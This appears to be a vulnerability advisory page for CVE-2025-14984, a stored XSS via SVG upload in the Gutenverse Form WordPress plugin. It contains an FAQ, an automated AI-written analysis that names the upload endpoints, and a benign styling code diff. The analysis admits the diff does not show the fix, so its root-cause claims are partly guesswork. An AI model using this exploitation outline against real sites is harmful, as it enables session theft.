What is CVE-2025-14984?

CVE-2025-14984 is a stored cross-site scripting (XSS) vulnerability affecting the Gutenverse Form plugin for WordPress, specifically in versions up to and including 2.3.2. This vulnerability allows authenticated users with Author-level access or higher to upload malicious SVG files that can execute JavaScript in the context of users viewing the file.

How does the vulnerability work?

The vulnerability arises because the Gutenverse Form plugin allows SVG file uploads without proper sanitization of the file contents. An attacker can upload an SVG file containing malicious JavaScript, which executes when the file is viewed by other users, potentially leading to session hijacking or other malicious actions.

Who is affected by this vulnerability?

Any WordPress site using the Gutenverse Form plugin version 2.3.2 or earlier is affected. Specifically, authenticated users with Author-level access or higher can exploit this vulnerability, making it crucial for site administrators to assess their user roles and plugin versions.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Gutenverse Form plugin installed. If it is version 2.3.2 or earlier, your site is at risk. Additionally, review user roles to identify if any users have Author-level access or higher.

How can I fix or mitigate this issue?

The recommended fix is to update the Gutenverse Form plugin to version 2.4.0 or later, which addresses the vulnerability. Additionally, consider restricting file upload permissions and implementing security measures such as file type validation and content sanitization.

What does the CVSS score of 6.4 indicate?

The CVSS score of 6.4 indicates a medium severity vulnerability. This means that while exploitation is possible, it requires authenticated access, thus limiting the potential impact compared to higher severity vulnerabilities.

What are the practical risks of this vulnerability?

If exploited, this vulnerability could allow attackers to execute arbitrary JavaScript in the context of users who view the malicious SVG file. This could lead to session hijacking, unauthorized actions on behalf of users, website defacement, or redirection to malicious sites.

What does the proof of concept demonstrate?

The proof of concept shows how an authenticated user can upload a malicious SVG file containing JavaScript that exfiltrates cookies to an attacker’s server. This demonstrates the ease of exploitation and the potential for serious security breaches if the vulnerability is not addressed.

Is there a patch available for this vulnerability?

Yes, a patch is available in version 2.4.0 of the Gutenverse Form plugin. However, it is important to review the patch notes to ensure that all security concerns are adequately addressed.

What additional security measures can I implement?

In addition to updating the plugin, consider implementing a web application firewall, regularly auditing user roles, and using security plugins that provide file upload restrictions and sanitization features to further protect your site.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, temporarily disable the Gutenverse Form plugin or restrict access to the media upload functionality for users with Author-level permissions until a secure version is installed.

How can I stay informed about future vulnerabilities?

Regularly monitor security advisories from the WordPress community, subscribe to vulnerability databases, and follow security blogs to stay informed about new vulnerabilities and best practices for securing your WordPress site.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14984: Gutenverse Form <= 2.3.2 – Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload (gutenverse-form)

CVE ID CVE-2025-14984

Plugin gutenverse-form

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 2.3.2

Patched Version 2.4.0

Disclosed January 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14984:
The Gutenverse Form WordPress plugin, versions up to and including 2.3.2, contains an authenticated stored cross-site scripting (XSS) vulnerability. The plugin’s framework component adds SVG as an allowed MIME type via the upload_mimes filter without sanitizing SVG file contents. Attackers with Author-level access or higher can upload malicious SVG files containing JavaScript, which executes when the file is viewed in a victim’s browser. This vulnerability has a CVSS score of 6.4 (Medium severity).

Atomic Edge research identifies the root cause in the plugin’s framework component, which modifies WordPress’s allowed MIME types. The plugin uses the upload_mimes filter to add SVG support without implementing content validation. The vulnerability manifests because the plugin framework (likely in a shared component) permits SVG uploads but does not sanitize or validate the XML content for malicious script elements. The code diff shows extensive changes to styling classes (class-form-input-date.php, class-form-input-email.php, etc.) that add SVG support to CSS selectors, indicating the plugin expanded SVG functionality without adding security controls.

Exploitation requires an authenticated attacker with at least Author privileges. The attacker uploads an SVG file containing JavaScript payloads within tags or event handlers (like onload). The malicious file uploads through WordPress’s media upload system, typically via /wp-admin/async-upload.php or /wp-admin/media-new.php endpoints. Once uploaded, the SVG file receives a public URL. When any user (including unauthenticated visitors) views the SVG file directly or embeds it in a page, the browser executes the embedded JavaScript in the victim’s context.

The patch in version 2.4.0 does not directly address the SVG upload vulnerability in the provided diff. The extensive code changes focus on adding SVG support to CSS selectors across multiple form input style classes (lines modified in class-form-input-date.php, class-form-input-email.php, etc.). These changes add ‘svg’ to CSS selectors alongside existing ‘i’ elements for icon styling. The patch appears to implement SVG icon functionality rather than fix the security issue. Atomic Edge analysis suggests the actual security fix likely occurs in a separate framework component not shown in this diff, possibly by removing SVG from upload_mimes or adding content sanitization.

Successful exploitation leads to stored XSS attacks. Attackers can steal session cookies, perform actions as the victim user, deface websites, or redirect users to malicious sites. For WordPress administrators viewing malicious SVGs, this could lead to full site compromise through plugin/theme installation, user creation, or content modification. The stored nature means a single upload can affect multiple users over time.

Differential between vulnerable and patched code

Code Diff

--- a/gutenverse-form/gutenverse-form.php
+++ b/gutenverse-form/gutenverse-form.php
@@ -4,7 +4,7 @@
  * Description: Powerful and intuitive form builder plugin designed to streamline the process of creating and managing forms on your WordPress website.
  * Plugin URI: https://gutenverse.com/
  * Author: Jegstudio
- * Version: 2.3.2
+ * Version: 2.4.0
  * Author URI: https://jegtheme.com/
  * License: GPLv3
  * Text Domain: gutenverse-form
@@ -15,7 +15,7 @@
 use Gutenverse_FormInit;

 defined( 'GUTENVERSE_FORM' ) || define( 'GUTENVERSE_FORM', 'gutenverse-form' );
-defined( 'GUTENVERSE_FORM_VERSION' ) || define( 'GUTENVERSE_FORM_VERSION', '2.3.2' );
+defined( 'GUTENVERSE_FORM_VERSION' ) || define( 'GUTENVERSE_FORM_VERSION', '2.4.0' );
 defined( 'GUTENVERSE_FORM_NOTICE_VERSION' ) || define( 'GUTENVERSE_FORM_NOTICE_VERSION', '1.0.0' );
 defined( 'GUTENVERSE_FORM_NAME' ) || define( 'GUTENVERSE_FORM_NAME', 'Gutenverse Form' );
 defined( 'GUTENVERSE_FORM_URL' ) || define( 'GUTENVERSE_FORM_URL', plugins_url( GUTENVERSE_FORM ) );
--- a/gutenverse-form/includes/class-editor-assets.php
+++ b/gutenverse-form/includes/class-editor-assets.php
@@ -35,13 +35,6 @@
 			GUTENVERSE_FORM_VERSION
 		);

-		wp_enqueue_style(
-			'gutenverse-form-frontend',
-			GUTENVERSE_FORM_URL . '/assets/css/frontend.css',
-			array( 'gutenverse-iconlist', 'fontawesome-gutenverse' ),
-			GUTENVERSE_FORM_VERSION
-		);
-
 		wp_enqueue_script( 'gutenverse-frontend-event' );

 		$include   = ( include GUTENVERSE_FORM_DIR . '/lib/dependencies/blocks.asset.php' )['dependencies'];
--- a/gutenverse-form/includes/class-frontend-assets.php
+++ b/gutenverse-form/includes/class-frontend-assets.php
@@ -21,6 +21,62 @@
 	public function __construct() {
 		add_filter( 'gutenverse_include_frontend', array( $this, 'load_conditional_scripts' ) );
 		add_filter( 'gutenverse_include_frontend', array( $this, 'load_conditional_styles' ) );
+		add_filter( 'gutenverse_conditional_script_attributes', array( $this, 'font_icon_conditional_load' ), null, 3 );
+	}
+
+	/**
+	 * Icon conditional load
+	 *
+	 * @param mixed $conditions The value from the attributes array.
+	 *
+	 * @since 3.3.0
+	 */
+	private function icon_conditional_load( &$conditions ) {
+		$conditions[] = array(
+			'style' => 'fontawesome-gutenverse',
+		);
+
+		$conditions[] = array(
+			'style' => 'gutenverse-iconlist',
+		);
+
+		return $conditions;
+	}
+
+	/**
+	 * Load the font icon
+	 *
+	 * @param mixed  $conditions The value from the attributes array.
+	 * @param string $attrs The comparison operator (e.g., '===', '!==').
+	 * @param mixed  $block_name The value to compare against.
+	 *
+	 * @since 3.3.0
+	 */
+	public function font_icon_conditional_load( $conditions, $attrs, $block_name ) {
+		switch ( $block_name ) {
+			case 'gutenverse/form-input-submit':
+			case 'gutenverse/form-input-telp':
+			case 'gutenverse/form-input-text':
+			case 'gutenverse/form-input-textarea':
+			case 'gutenverse/form-input-number':
+			case 'gutenverse/form-input-email':
+			case 'gutenverse/form-input-date':
+				if ( isset( $attrs['showIcon'] ) && $attrs['showIcon'] ) {
+					if ( ! isset( $attrs['iconType'] ) || 'icon' === $attrs['iconType'] ) {
+						$this->icon_conditional_load( $conditions );
+					}
+				}
+				break;
+			case 'gutenverse/form-input-select':
+				if ( isset( $attrs['useCustomDropdown'] ) && $attrs['useCustomDropdown'] ) {
+					if ( ! isset( $attrs['dropDownIconOpenType'] ) || 'icon' === $attrs['dropDownIconOpenType'] || ! isset( $attrs['dropDownIconCloseType'] ) || 'icon' === $attrs['dropDownIconCloseType'] ) {
+						$this->icon_conditional_load( $conditions );
+					}
+				}
+				break;
+		}
+
+		return $conditions;
 	}

 	/**
@@ -34,7 +90,7 @@
 			'input-date',
 			'input-gdpr',
 			'input-multiselect',
-			'input-select'
+			'input-select',
 		);

 		foreach ( $blocks as $block ) {
@@ -60,7 +116,7 @@
 		wp_register_style(
 			'gutenverse-form-frontend-form-input-general-style',
 			GUTENVERSE_FORM_URL . '/assets/css/general-input.css',
-			array( 'fontawesome-gutenverse', 'gutenverse-iconlist' ),
+			array(),
 			GUTENVERSE_FORM_VERSION
 		);

@@ -86,10 +142,9 @@
 			wp_register_style(
 				'gutenverse-form-frontend-' . $block . '-style',
 				GUTENVERSE_FORM_URL . '/assets/css/frontend/' . $block . '.css',
-				array('gutenverse-form-frontend-form-input-general-style'),
+				array( 'gutenverse-form-frontend-form-input-general-style' ),
 				GUTENVERSE_FORM_VERSION
 			);
 		}
 	}
-
 }
--- a/gutenverse-form/includes/style/class-form-input-date.php
+++ b/gutenverse-form/includes/style/class-form-input-date.php
@@ -384,7 +384,7 @@
 		if ( isset( $this->attrs['inputColorFocus'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon i",
+					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -470,11 +470,11 @@
 			);
 		}

-		if ( isset( $this->attrs['iconType'] ) && 'icon' === $this->attrs['iconType'] ) {
+		if ( isset( $this->attrs['iconType'] ) && in_array( $this->attrs['iconType'], array( 'icon', 'svg' ), true ) ) {
 			if ( isset( $this->attrs['iconSize'] ) ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon i",
+						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon svg",
 						'property'       => function ( $value ) {
 							return "font-size: {$value}px;";
 						},
@@ -542,7 +542,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -566,7 +566,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradient'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackground'] ) ) {
@@ -602,7 +602,7 @@
 		if ( isset( $this->attrs['iconHoverColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-date-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-date-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-date-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -626,9 +626,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientHover'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-date-icon .icon.style-gradient i", $this->attrs['iconColorGradientHover'] );
-		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-date-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-date-icon .icon.style-gradient svg", $this->attrs['iconColorGradientHover'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundHover'] ) ) {
@@ -676,7 +674,7 @@
 		if ( isset( $this->attrs['iconFocusColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -700,9 +698,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientFocus'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon.style-gradient i", $this->attrs['iconColorGradientFocus'] );
-		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-date-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-date-icon .icon.style-gradient svg", $this->attrs['iconColorGradientFocus'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundFocus'] ) ) {
--- a/gutenverse-form/includes/style/class-form-input-email.php
+++ b/gutenverse-form/includes/style/class-form-input-email.php
@@ -384,7 +384,7 @@
 		if ( isset( $this->attrs['inputColorFocus'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon i",
+					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -470,11 +470,11 @@
 			);
 		}

-		if ( isset( $this->attrs['iconType'] ) && 'icon' === $this->attrs['iconType'] ) {
+		if ( isset( $this->attrs['iconType'] ) && in_array( $this->attrs['iconType'], array( 'icon', 'svg' ), true ) ) {
 			if ( isset( $this->attrs['iconSize'] ) ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon i",
+						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon svg",
 						'property'       => function ( $value ) {
 							return "font-size: {$value}px;";
 						},
@@ -542,7 +542,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -566,7 +566,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradient'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackground'] ) ) {
@@ -602,7 +602,7 @@
 		if ( isset( $this->attrs['iconHoverColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-email-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-email-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-email-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -626,9 +626,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientHover'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-email-icon .icon.style-gradient i", $this->attrs['iconColorGradientHover'] );
-		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-email-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-email-icon .icon.style-gradient svg", $this->attrs['iconColorGradientHover'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundHover'] ) ) {
@@ -676,7 +674,7 @@
 		if ( isset( $this->attrs['iconFocusColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -700,9 +698,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientFocus'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon.style-gradient i", $this->attrs['iconColorGradientFocus'] );
-		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-email-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-email-icon .icon.style-gradient svg", $this->attrs['iconColorGradientFocus'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundFocus'] ) ) {
--- a/gutenverse-form/includes/style/class-form-input-number.php
+++ b/gutenverse-form/includes/style/class-form-input-number.php
@@ -383,7 +383,7 @@
 		if ( isset( $this->attrs['inputColorFocus'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon i",
+					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -469,11 +469,11 @@
 			);
 		}

-		if ( isset( $this->attrs['iconType'] ) && 'icon' === $this->attrs['iconType'] ) {
+		if ( isset( $this->attrs['iconType'] ) && in_array( $this->attrs['iconType'], array( 'icon', 'svg' ), true ) ) {
 			if ( isset( $this->attrs['iconSize'] ) ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon i",
+						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon svg",
 						'property'       => function ( $value ) {
 							return "font-size: {$value}px;";
 						},
@@ -541,7 +541,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -565,7 +565,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradient'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackground'] ) ) {
@@ -601,7 +601,7 @@
 		if ( isset( $this->attrs['iconHoverColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-number-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-number-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-number-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -625,9 +625,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientHover'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-number-icon .icon.style-gradient i", $this->attrs['iconColorGradientHover'] );
-		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-number-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-number-icon .icon.style-gradient svg", $this->attrs['iconColorGradientHover'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundHover'] ) ) {
@@ -675,7 +673,7 @@
 		if ( isset( $this->attrs['iconFocusColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -699,9 +697,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientFocus'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon.style-gradient i", $this->attrs['iconColorGradientFocus'] );
-		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-number-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-number-icon .icon.style-gradient svg", $this->attrs['iconColorGradientFocus'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundFocus'] ) ) {
--- a/gutenverse-form/includes/style/class-form-input-submit.php
+++ b/gutenverse-form/includes/style/class-form-input-submit.php
@@ -89,7 +89,7 @@
 			if ( 'after' === $this->attrs['iconPosition'] ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .guten-button i",
+						'selector'       => ".{$this->element_id} .guten-button i, .{$this->element_id} .guten-button svg",
 						'property'       => function ( $value ) {
 							return "margin-left: {$value}px;";
 						},
@@ -100,7 +100,7 @@
 			} else {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .guten-button i",
+						'selector'       => ".{$this->element_id} .guten-button i, .{$this->element_id} .guten-button svg",
 						'property'       => function ( $value ) {
 							return "margin-right: {$value}px;";
 						},
@@ -114,7 +114,7 @@
 		if ( isset( $this->attrs['iconSize'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .guten-button i",
+					'selector'       => ".{$this->element_id} .guten-button i, .{$this->element_id} .guten-button svg",
 					'property'       => function ( $value ) {
 						return $this->handle_unit_point( $value, 'font-size' );
 					},
@@ -153,7 +153,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button i",
+					'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button i, .{$this->element_id}.guten-button-wrapper .guten-button svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -179,7 +179,7 @@
 		if ( isset( $this->attrs['hoverIconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button:hover i",
+					'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button:hover i, .{$this->element_id}.guten-button-wrapper .guten-button:hover svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -203,7 +203,7 @@
 				$this->inject_style(
 					array(
 						'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button span",
-						'property'       => function ( $value ) {
+						'property'       => function () {
 							return 'height: 15px; ';
 						},
 						'value'          => '',
@@ -330,8 +330,8 @@
 			if ( $this->attrs['iconLineHeight'] ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button i",
-						'property'       => function ( $value ) {
+						'selector'       => ".{$this->element_id}.guten-button-wrapper .guten-button i, .{$this->element_id}.guten-button-wrapper .guten-button svg",
+						'property'       => function () {
 							return 'line-height: normal';
 						},
 						'value'          => $this->attrs['iconLineHeight'],
--- a/gutenverse-form/includes/style/class-form-input-telp.php
+++ b/gutenverse-form/includes/style/class-form-input-telp.php
@@ -384,7 +384,7 @@
 		if ( isset( $this->attrs['inputColorFocus'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon i",
+					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -470,11 +470,11 @@
 			);
 		}

-		if ( isset( $this->attrs['iconType'] ) && 'icon' === $this->attrs['iconType'] ) {
+		if ( isset( $this->attrs['iconType'] ) && in_array( $this->attrs['iconType'], array( 'icon', 'svg' ), true ) ) {
 			if ( isset( $this->attrs['iconSize'] ) ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon i",
+						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon svg",
 						'property'       => function ( $value ) {
 							return "font-size: {$value}px;";
 						},
@@ -542,7 +542,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -566,7 +566,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradient'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackground'] ) ) {
